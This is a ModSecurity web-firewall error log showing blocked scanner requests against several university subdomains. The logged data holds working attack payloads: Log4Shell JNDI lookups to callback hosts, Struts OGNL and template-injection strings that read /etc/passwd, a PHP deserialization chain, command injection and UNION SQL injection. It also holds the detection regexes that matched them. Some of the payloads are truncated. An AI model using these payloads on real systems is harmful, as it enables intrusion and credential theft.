[Tue Aug 29 11:35:03.323145 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11d8Co-f0AAATSkoIAAAAT"]
[Tue Aug 29 11:35:03.323614 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAARdiTYAAAAK"]
[Tue Aug 29 11:35:03.324776 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUTiYsAAABJ"]
[Tue Aug 29 11:35:03.326686 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUJIzUAAABB"]
[Tue Aug 29 11:35:03.327313 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVQYyAAAAAI"]
[Tue Aug 29 11:35:03.331358 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATUxR0AAAAW"]
[Tue Aug 29 11:35:03.335772 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11d8Co-f0AAATWYSEAAAAa"]
[Tue Aug 29 11:35:03.340601 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAShCacAAAAi"]
[Tue Aug 29 11:35:03.341883 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVK0HoAAAAB"]
[Tue Aug 29 11:35:03.344309 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUOaU4AAABG"]
[Tue Aug 29 11:35:04.314688 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgxh14gmezucxoj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAVQYyEAAAAI"]
[Tue Aug 29 11:35:04.317586 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUbg1kAAABQ"]
[Tue Aug 29 11:35:04.324017 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUR84sAAABI"]
[Tue Aug 29 11:35:04.327711 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAAVJXk0AAAAA"]
[Tue Aug 29 11:35:04.333615 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlg5juxoafcnj53g.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAUGZAUAAAA@"]
[Tue Aug 29 11:35:04.338674 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlga54f1581je9wj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAATavvYAAAAg"]
[Tue Aug 29 11:35:04.339722 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUZcGQAAABO"]
[Tue Aug 29 11:35:04.341461 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAATSkoMAAAAT"]
[Tue Aug 29 11:35:04.359655 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAASPDNQAAAAS"]
[Tue Aug 29 11:35:04.364896 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAATUxR8AAAAW"]
[Tue Aug 29 11:35:04.379697 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11eMCo-f0AAAPLwKYAAAAX"]
[Tue Aug 29 11:35:04.386890 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgoegjxbzjec6ch.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAASEJYcAAAAE"]
[Tue Aug 29 11:35:04.409248 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAATzVJUAAAAx"]
[Tue Aug 29 11:35:05.298882 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgfoz79r1t96myx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAVJXk4AAAAA"]
[Tue Aug 29 11:35:05.306541 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg7mr6tkbkq4tyb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAUZcGUAAABO"]
[Tue Aug 29 11:35:05.320538 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgo67z5iqd99a1m.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAAPLwKcAAAAX"]
[Tue Aug 29 11:35:05.332423 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgqa4fwu9dyi1b4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAASEJYgAAAAE"]
[Tue Aug 29 11:35:05.334571 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11ecCo-f0AAAShCakAAAAi"]
[Tue Aug 29 11:35:05.335332 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlge5eie8bgoc3xm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAUNaloAAABF"]
[Tue Aug 29 11:35:05.355846 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlge4sc4ka9nczh5.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAT2JRgAAAAz"]
[Tue Aug 29 11:35:05.357790 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgo5tyju6xf5spg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAARdiTgAAAAK"]
[Tue Aug 29 11:35:06.330953 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg5shdpmm7qup4f.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg5shdpmm7qup4f.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUGZAkAAAA@"]
[Tue Aug 29 11:35:06.333742 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgtpogskb9c63bj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11esCo-f0AAAVJXlAAAAAA"]
